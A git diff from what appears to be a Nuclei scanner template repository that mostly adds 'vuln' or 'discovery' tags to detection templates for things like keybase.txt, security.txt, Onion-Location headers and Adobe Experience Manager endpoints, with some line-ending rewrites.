- tags: keybase,identity,well-known,pgp,discovery,osint,misc - -http: - - method: GET - path: - - "{{BaseURL}}/.well-known/keybase.txt" - - matchers: - - type: dsl - dsl: - - "status_code == 200 && contains(body, 'https://keybase.io/')" - - extractors: - - type: regex - name: keybase-username - part: body - regex: - - "([a-zA-Z0-9_-]+) \\(https://keybase.io/[a-zA-Z0-9_-]+\\)" - - - type: regex - name: pgp-message - part: body - regex: +id: keybase-domain-owwnership-verification + +info: + name: Keybase Domain Ownership Verification + author: rxerium + severity: info + description: | + Detects presence of keybase.txt used to prove domain ownership via Keybase identity. + reference: + - https://book.keybase.io/account#proofs + metadata: + verified: true + max-request: 1 + shodan-query: html:"keybase.txt" + tags: keybase,identity,well-known,pgp,discovery,osint,misc,vuln + +http: + - method: GET + path: + - "{{BaseURL}}/.well-known/keybase.txt" + + matchers: + - type: dsl + dsl: + - "status_code == 200 && contains(body, 'https://keybase.io/')" + + extractors: + - type: regex + name: keybase-username + part: body + regex: + - "([a-zA-Z0-9_-]+) \\(https://keybase.io/[a-zA-Z0-9_-]+\\)" + + - type: regex + name: pgp-message + part: body + regex: - "-----BEGIN PGP MESSAGE-----[\\s\\S]+?-----END PGP MESSAGE-----" # digest: 490a00463044022058f8df962175b4611a1a08ef4140a38b0ee34622ed9cead5ec3f62b024687607022045730bd2bb1375ebbef27fd4ca3451ebf53599298014801a2750b9bc75ae64cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/maxforwards-headers-detect.yaml b/http/miscellaneous/maxforwards-headers-detect.yaml index d7e5d69adec..a79ff7002f4 100644 --- a/http/miscellaneous/maxforwards-headers-detect.yaml +++ b/http/miscellaneous/maxforwards-headers-detect.yaml @@ -1,5 +1,5 @@ -id: maxforwards-headers-detect - +id: maxforwards-headers-detect + info: name: Max-Forwards Header - Detect author: righettod @@ -14,21 +14,21 @@ info: max-request: 1 shodan-query: "Max-Forwards:" fofa-query: header="max-forwards" - tags: miscellaneous,misc,max-forwards + tags: miscellaneous,misc,max-forwards,vuln -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'contains(to_lower(header), "max-forwards:")' - - extractors: - - type: regex - part: header - regex: +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'contains(to_lower(header), "max-forwards:")' + + extractors: + - type: regex + part: header + regex: - '(?i)max-forwards:\s+([0-9]+)' # digest: 490a00463044022064aaa002bdbbb66e98cc473c0e1c664c55b5f0d0f4c23a04fadb99ee3860ec1d022025eda710c90681bd3b083f832ac1e3d25662af18da42d72bc34367aac287cfe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index cfeb9bd3c53..c87f18a5479 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -11,7 +11,7 @@ info: vendor: microsoft product: azure_app_service_on_azure_stack shodan-query: title:"Microsoft Azure Web App - Error 404" - tags: error,azure,microsoft,misc,takeover,miscellaneous + tags: error,azure,microsoft,misc,takeover,miscellaneous,vuln http: - method: GET diff --git a/http/miscellaneous/moodle-changelog.yaml b/http/miscellaneous/moodle-changelog.yaml index e40806330ae..79314277d52 100644 --- a/http/miscellaneous/moodle-changelog.yaml +++ b/http/miscellaneous/moodle-changelog.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 2 - tags: moodle,exposure,misc + tags: moodle,exposure,misc,vuln http: - method: GET diff --git a/http/miscellaneous/mta-sts-exposure.yaml b/http/miscellaneous/mta-sts-exposure.yaml index 26653389f19..341e0ff25f6 100644 --- a/http/miscellaneous/mta-sts-exposure.yaml +++ b/http/miscellaneous/mta-sts-exposure.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 google-query: inurl:"/.well-known/mta-sts.txt" - tags: well-known,email,security,rfc8461,miscellaneous,misc + tags: well-known,email,security,rfc8461,miscellaneous,misc,vuln http: - method: GET diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml index 09b5a49524b..1df0f230167 100644 --- a/http/miscellaneous/netflix-conductor-version.yaml +++ b/http/miscellaneous/netflix-conductor-version.yaml @@ -15,7 +15,7 @@ info: vendor: netflix product: conductor shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" - tags: miscellaneous,tech,netflix,conductor,api,misc + tags: miscellaneous,tech,netflix,conductor,api,misc,discovery http: - method: GET diff --git a/http/miscellaneous/nostr-json-exposure.yaml b/http/miscellaneous/nostr-json-exposure.yaml index bcbe4ba3fe2..1533a35616a 100644 --- a/http/miscellaneous/nostr-json-exposure.yaml +++ b/http/miscellaneous/nostr-json-exposure.yaml @@ -12,7 +12,7 @@ info: - https://github.com/nostr-protocol/nips/blob/master/05.md metadata: google-query: inurl:"/.well-known/nostr.json" - tags: well-known,nostr,miscellaneous,misc + tags: well-known,nostr,miscellaneous,misc,vuln http: - method: GET diff --git a/http/miscellaneous/ntlm-directories.yaml b/http/miscellaneous/ntlm-directories.yaml index 41f5ba53bcc..b125920e59f 100644 --- a/http/miscellaneous/ntlm-directories.yaml +++ b/http/miscellaneous/ntlm-directories.yaml @@ -8,7 +8,7 @@ info: - https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 metadata: max-request: 48 - tags: miscellaneous,misc,fuzz,windows + tags: miscellaneous,misc,fuzz,windows,vuln http: - raw: diff --git a/http/miscellaneous/oauth-authorization-server-exposure.yaml b/http/miscellaneous/oauth-authorization-server-exposure.yaml index 6c40fe6afbc..9db430cda21 100644 --- a/http/miscellaneous/oauth-authorization-server-exposure.yaml +++ b/http/miscellaneous/oauth-authorization-server-exposure.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 google-query: inurl:"/.well-known/oauth-authorization-server" - tags: well-known,oauth,oidc,security,rfc8414,miscellaneous,misc + tags: well-known,oauth,oidc,security,rfc8414,miscellaneous,misc,vuln http: - method: GET diff --git a/http/miscellaneous/old-copyright.yaml b/http/miscellaneous/old-copyright.yaml index 9f1ff9f4740..e6e930ee596 100644 --- a/http/miscellaneous/old-copyright.yaml +++ b/http/miscellaneous/old-copyright.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true max-request: 1 - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,vuln http: - method: GET diff --git a/http/miscellaneous/onion-website-supported.yaml b/http/miscellaneous/onion-website-supported.yaml index debb9ca0b6b..611118ed5dd 100644 --- a/http/miscellaneous/onion-website-supported.yaml +++ b/http/miscellaneous/onion-website-supported.yaml @@ -1,31 +1,31 @@ -id: onion-website-supported - -info: - name: Onion Website Supported via Onion-Location Header - author: rxerium - severity: info - description: | - Identified websites that supported Tor network access through the Onion-Location HTTP response header, which pointed to a corresponding .onion service for enhanced privacy and anonymity. - metadata: - verified: true - max-request: 1 - tags: misc,osint,tor,onion - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: regex - part: header - regex: - - '(?i)onion-location:\s*https?://[a-z0-9]+\.onion' - - extractors: - - type: regex - part: header - group: 1 - regex: +id: onion-website-supported + +info: + name: Onion Website Supported via Onion-Location Header + author: rxerium + severity: info + description: | + Identified websites that supported Tor network access through the Onion-Location HTTP response header, which pointed to a corresponding .onion service for enhanced privacy and anonymity. + metadata: + verified: true + max-request: 1 + tags: misc,osint,tor,onion,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: header + regex: + - '(?i)onion-location:\s*https?://[a-z0-9]+\.onion' + + extractors: + - type: regex + part: header + group: 1 + regex: - '(?i)onion-location:\s*(https?://[a-z0-9]+\.onion)' # digest: 4a0a00473045022034776f9c644629fbec1a62525951f69b341f282155bf85b0e4a581b3dff5e2ba0221009bd73940cf9ddebc41830635e64d3d615e5cec41938d98f4b2d2b23fd99caec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/options-method.yaml b/http/miscellaneous/options-method.yaml index c758b130655..6497707af77 100644 --- a/http/miscellaneous/options-method.yaml +++ b/http/miscellaneous/options-method.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,vuln http: - method: OPTIONS diff --git a/http/miscellaneous/pki-validation-exposure.yaml b/http/miscellaneous/pki-validation-exposure.yaml index 8829eb83f30..36a7cd4092c 100644 --- a/http/miscellaneous/pki-validation-exposure.yaml +++ b/http/miscellaneous/pki-validation-exposure.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 google-query: inurl:"/.well-known/pki-validation/" - tags: well-known,pki,certificate,validation,miscellaneous,misc + tags: well-known,pki,certificate,validation,miscellaneous,misc,vuln http: - method: GET diff --git a/http/miscellaneous/rdap-whois.yaml b/http/miscellaneous/rdap-whois.yaml index 730953930a3..d4fc4391465 100644 --- a/http/miscellaneous/rdap-whois.yaml +++ b/http/miscellaneous/rdap-whois.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 1 - tags: miscellaneous,whois,rdap,osint,misc + tags: miscellaneous,whois,rdap,osint,misc,vuln http: - method: GET diff --git a/http/miscellaneous/robots-txt-endpoint.yaml b/http/miscellaneous/robots-txt-endpoint.yaml index a4d6be1c240..e9ce8469cba 100644 --- a/http/miscellaneous/robots-txt-endpoint.yaml +++ b/http/miscellaneous/robots-txt-endpoint.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 verified: true - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,discovery http: - method: GET diff --git a/http/miscellaneous/robots-txt.yaml b/http/miscellaneous/robots-txt.yaml index 617b7c19541..bebf3778ffa 100644 --- a/http/miscellaneous/robots-txt.yaml +++ b/http/miscellaneous/robots-txt.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,vuln http: - method: GET diff --git a/http/miscellaneous/security-txt.yaml b/http/miscellaneous/security-txt.yaml index 537773676a3..236b4cc835c 100644 --- a/http/miscellaneous/security-txt.yaml +++ b/http/miscellaneous/security-txt.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: http.securitytxt:contact http.status:200 - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,vuln http: - method: GET diff --git a/http/miscellaneous/seized-site.yaml b/http/miscellaneous/seized-site.yaml index ae632925d2e..ac98e1caced 100644 --- a/http/miscellaneous/seized-site.yaml +++ b/http/miscellaneous/seized-site.yaml @@ -1,33 +1,33 @@ -id: seized-site - -info: - name: Seized Site - author: rxerium - severity: info - description: | - This website has been seized by law enforcement - metadata: - max-request: 1 - verified: true - shodan-query: title:"THIS WEBSITE HAS BEEN SEIZED" - tags: seized,miscellaneous,misc - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "THIS WEBSITE HAS BEEN SEIZED" - - "This domain has been seized by the Federal Bureau of Investigation" - case-insensitive: true - condition: or - - - type: status - status: +id: seized-site + +info: + name: Seized Site + author: rxerium + severity: info + description: | + This website has been seized by law enforcement + metadata: + max-request: 1 + verified: true + shodan-query: title:"THIS WEBSITE HAS BEEN SEIZED" + tags: seized,miscellaneous,misc,vuln + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "THIS WEBSITE HAS BEEN SEIZED" + - "This domain has been seized by the Federal Bureau of Investigation" + case-insensitive: true + condition: or + + - type: status + status: - 200 # digest: 490a004630440220316a8b657dda6e54a6b692b17c64e469ae9a15a7e6538548f28a2d9b89f87cc60220039e1d5b07581a920e196701f8e37c93dd6b3ff73f4679543196557be0c60ecd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/sitemap-detect.yaml b/http/miscellaneous/sitemap-detect.yaml index f0f484d108e..8a59ce31356 100644 --- a/http/miscellaneous/sitemap-detect.yaml +++ b/http/miscellaneous/sitemap-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 3 google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd - tags: miscellaneous,misc,generic,sitemap + tags: miscellaneous,misc,generic,sitemap,vuln http: - method: GET diff --git a/http/miscellaneous/spnego-detect.yaml b/http/miscellaneous/spnego-detect.yaml index fca89b5d2fd..6d39feafc4a 100644 --- a/http/miscellaneous/spnego-detect.yaml +++ b/http/miscellaneous/spnego-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: 'www-authenticate: negotiate' - tags: miscellaneous,misc,windows,spnego + tags: miscellaneous,misc,windows,spnego,vuln http: - method: GET diff --git a/http/miscellaneous/torrent-website-detect.yaml b/http/miscellaneous/torrent-website-detect.yaml index 897d054480f..73ae0846531 100644 --- a/http/miscellaneous/torrent-website-detect.yaml +++ b/http/miscellaneous/torrent-website-detect.yaml @@ -1,40 +1,40 @@ -id: torrent-magnet-detect - -info: - name: Torrent Magnet - Detect - author: rxerium - severity: info - description: | - Detects magnet links present on a website, which are commonly used for torrenting. - reference: - - https://www.zdnet.com/article/what-is-torrenting-and-how-does-it-work/ - metadata: - verified: true - max-request: 1 - tags: torrent,website,detect,piracy,osint - -http: - - method: GET - path: - - "{{BaseURL}}" - - max-redirects: 1 - redirects: true - - matchers-condition: and - matchers: - - type: word - words: - - "magnet:?xt=urn:btih:" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: magnet-link - part: body - regex: +id: torrent-magnet-detect + +info: + name: Torrent Magnet - Detect + author: rxerium + severity: info + description: | + Detects magnet links present on a website, which are commonly used for torrenting. + reference: + - https://www.zdnet.com/article/what-is-torrenting-and-how-does-it-work/ + metadata: + verified: true + max-request: 1 + tags: torrent,website,detect,piracy,osint,vuln + +http: + - method: GET + path: + - "{{BaseURL}}" + + max-redirects: 1 + redirects: true + + matchers-condition: and + matchers: + - type: word + words: + - "magnet:?xt=urn:btih:" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: magnet-link + part: body + regex: - "magnet:\\?xt=urn:btih:[a-zA-Z0-9]*[^\"'\\s<]*" # digest: 4a0a00473045022058a5302d1dae10a8841a8e1feb27e7747fdb608463f306157e925d4564621108022100f6c030d32ff6af6d040e91b9bb2b2f56a8537910b49346c8ed85b1aed87f324c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/trust-center-detect.yaml b/http/miscellaneous/trust-center-detect.yaml index c84dba06a1d..85ba8a93136 100644 --- a/http/miscellaneous/trust-center-detect.yaml +++ b/http/miscellaneous/trust-center-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 6 shodan-query: http.title:"Trust Center" - tags: misc,trust,center,generic + tags: misc,trust,center,generic,vuln http: - method: GET diff --git a/http/miscellaneous/x-recruiting-header.yaml b/http/miscellaneous/x-recruiting-header.yaml index 9ce57113635..67679bde723 100644 --- a/http/miscellaneous/x-recruiting-header.yaml +++ b/http/miscellaneous/x-recruiting-header.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: "X-Recruiting:" - tags: miscellaneous,misc,hiring,jobs,employment,generic + tags: miscellaneous,misc,hiring,jobs,employment,generic,vuln http: - method: GET diff --git a/http/miscellaneous/xml-schema-detect.yaml b/http/miscellaneous/xml-schema-detect.yaml index e8346c120c6..44a3cb10993 100644 --- a/http/miscellaneous/xml-schema-detect.yaml +++ b/http/miscellaneous/xml-schema-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: miscellaneous,misc,generic + tags: miscellaneous,misc,generic,vuln http: - method: GET diff --git a/http/misconfiguration/ace-admin-dashboard.yaml b/http/misconfiguration/ace-admin-dashboard.yaml index 78f8bfb8200..a10f6bab3cb 100644 --- a/http/misconfiguration/ace-admin-dashboard.yaml +++ b/http/misconfiguration/ace-admin-dashboard.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Dashboard - Ace Admin" - tags: misconfig,exposure,aceadmin + tags: misconfig,exposure,aceadmin,discovery http: - method: GET diff --git a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml index 2783d6086f2..16ec3fd4eb8 100644 --- a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml +++ b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml @@ -9,7 +9,7 @@ info: - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html metadata: max-request: 1 - tags: adobe,disclosure,packetstorm,misconfig + tags: adobe,disclosure,packetstorm,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/adobe/adobe-connect-version.yaml b/http/misconfiguration/adobe/adobe-connect-version.yaml index 32079ec3037..6777cab107b 100644 --- a/http/misconfiguration/adobe/adobe-connect-version.yaml +++ b/http/misconfiguration/adobe/adobe-connect-version.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: adobe,misconfig + tags: adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-acs-common.yaml b/http/misconfiguration/aem/aem-acs-common.yaml index 76bcd87f890..e20d2384e58 100644 --- a/http/misconfiguration/aem/aem-acs-common.yaml +++ b/http/misconfiguration/aem/aem-acs-common.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-bg-servlet.yaml b/http/misconfiguration/aem/aem-bg-servlet.yaml index b800551c727..e6593698ec0 100644 --- a/http/misconfiguration/aem/aem-bg-servlet.yaml +++ b/http/misconfiguration/aem/aem-bg-servlet.yaml @@ -13,7 +13,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-bulkeditor.yaml b/http/misconfiguration/aem/aem-bulkeditor.yaml index 0c12f472759..e8586943889 100644 --- a/http/misconfiguration/aem/aem-bulkeditor.yaml +++ b/http/misconfiguration/aem/aem-bulkeditor.yaml @@ -15,7 +15,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,editor + tags: misconfig,aem,adobe,editor,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml index b85c7bc030b..29e99e12468 100644 --- a/http/misconfiguration/aem/aem-cached-pages.yaml +++ b/http/misconfiguration/aem/aem-cached-pages.yaml @@ -14,7 +14,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-childrenlist-xss.yaml b/http/misconfiguration/aem/aem-childrenlist-xss.yaml index 0673f5f0fee..bc0c4ef96da 100644 --- a/http/misconfiguration/aem/aem-childrenlist-xss.yaml +++ b/http/misconfiguration/aem/aem-childrenlist-xss.yaml @@ -19,7 +19,7 @@ info: - http.component:"Adobe Experience Manager" product: experience_manager vendor: adobe - tags: xss,aem,adobe,misconfig + tags: xss,aem,adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-browser.yaml b/http/misconfiguration/aem/aem-crx-browser.yaml index e86e314abf9..f9df5ec7697 100644 --- a/http/misconfiguration/aem/aem-crx-browser.yaml +++ b/http/misconfiguration/aem/aem-crx-browser.yaml @@ -11,7 +11,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-bypass.yaml b/http/misconfiguration/aem/aem-crx-bypass.yaml index 2e1d82335f6..965d7e54046 100644 --- a/http/misconfiguration/aem/aem-crx-bypass.yaml +++ b/http/misconfiguration/aem/aem-crx-bypass.yaml @@ -15,7 +15,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig + tags: aem,adobe,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index 7d7d865862c..50a2af33f77 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: exposure,aem,adobe,misconfig + tags: exposure,aem,adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-crx-search.yaml b/http/misconfiguration/aem/aem-crx-search.yaml index 9b3faf4cd97..7e4cf35f488 100644 --- a/http/misconfiguration/aem/aem-crx-search.yaml +++ b/http/misconfiguration/aem/aem-crx-search.yaml @@ -15,7 +15,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-custom-script.yaml b/http/misconfiguration/aem/aem-custom-script.yaml index 4615e88cfa4..52721a55cde 100644 --- a/http/misconfiguration/aem/aem-custom-script.yaml +++ b/http/misconfiguration/aem/aem-custom-script.yaml @@ -15,7 +15,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-debugging-libraries.yaml b/http/misconfiguration/aem/aem-debugging-libraries.yaml index 9ab833a2a19..600f761aa47 100644 --- a/http/misconfiguration/aem/aem-debugging-libraries.yaml +++ b/http/misconfiguration/aem/aem-debugging-libraries.yaml @@ -17,7 +17,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-default-get-servlet.yaml b/http/misconfiguration/aem/aem-default-get-servlet.yaml index ce8d86ae27b..8df06af6a23 100644 --- a/http/misconfiguration/aem/aem-default-get-servlet.yaml +++ b/http/misconfiguration/aem/aem-default-get-servlet.yaml @@ -15,7 +15,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig + tags: aem,adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml index 793cdc8098b..fc33ca415ac 100644 --- a/http/misconfiguration/aem/aem-disk-usage.yaml +++ b/http/misconfiguration/aem/aem-disk-usage.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-dump-contentnode.yaml b/http/misconfiguration/aem/aem-dump-contentnode.yaml index 3515c27007a..21c0e37ecf7 100644 --- a/http/misconfiguration/aem/aem-dump-contentnode.yaml +++ b/http/misconfiguration/aem/aem-dump-contentnode.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml index 3bd4b4981dc..cf665a40e78 100644 --- a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml +++ b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-external-link-checker.yaml b/http/misconfiguration/aem/aem-external-link-checker.yaml index 571944a58db..8d2a485eac6 100644 --- a/http/misconfiguration/aem/aem-external-link-checker.yaml +++ b/http/misconfiguration/aem/aem-external-link-checker.yaml @@ -15,7 +15,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml index ba2cecf1860..7383468fb6b 100644 --- a/http/misconfiguration/aem/aem-gql-servlet.yaml +++ b/http/misconfiguration/aem/aem-gql-servlet.yaml @@ -14,7 +14,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-groovyconsole.yaml b/http/misconfiguration/aem/aem-groovyconsole.yaml index e058656b082..f0051d750a1 100644 --- a/http/misconfiguration/aem/aem-groovyconsole.yaml +++ b/http/misconfiguration/aem/aem-groovyconsole.yaml @@ -15,7 +15,7 @@ info: vendor: adobe product: experience_manager_cloud_service shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,hackerone,misconfig + tags: aem,adobe,hackerone,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml index 21af71d212a..bacda8c62ce 100644 --- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -14,7 +14,7 @@ info: vendor: adobe product: acs_aem_commons shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml index 1cb81009eb6..2a4fe38daeb 100644 --- a/http/misconfiguration/aem/aem-jcr-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-jcr-querybuilder.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/aem/aem-login-status.yaml b/http/misconfiguration/aem/aem-login-status.yaml index 9c722149bfb..a2e09b295e4 100644 --- a/http/misconfiguration/aem/aem-login-status.yaml +++ b/http/misconfiguration/aem/aem-login-status.yaml @@ -15,7 +15,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig + tags: aem,adobe,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml index a0f91088911..9aeb41a65b8 100644 --- a/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml +++ b/http/misconfiguration/aem/aem-merge-metadata-servlet.yaml @@ -13,7 +13,7 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-misc-admin.yaml b/http/misconfiguration/aem/aem-misc-admin.yaml index 687ee46c545..4ce4a4aa0c7 100644 --- a/http/misconfiguration/aem/aem-misc-admin.yaml +++ b/http/misconfiguration/aem/aem-misc-admin.yaml @@ -13,7 +13,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe,exposure + tags: misconfig,aem,adobe,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-offloading-browser.yaml b/http/misconfiguration/aem/aem-offloading-browser.yaml index be71c789a9b..8ea07252e38 100644 --- a/http/misconfiguration/aem/aem-offloading-browser.yaml +++ b/http/misconfiguration/aem/aem-offloading-browser.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-osgi-bundles.yaml b/http/misconfiguration/aem/aem-osgi-bundles.yaml index 9761f87e373..f512063a10d 100644 --- a/http/misconfiguration/aem/aem-osgi-bundles.yaml +++ b/http/misconfiguration/aem/aem-osgi-bundles.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - tags: misconfig,aem,adobe + tags: misconfig,aem,adobe,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml index 27abd56ceee..94e065ae734 100644 --- a/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index 89055512189..1ad049a6776 100644 --- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -14,7 +14,7 @@ info: vendor: adobe product: experience_manager shodan-query: 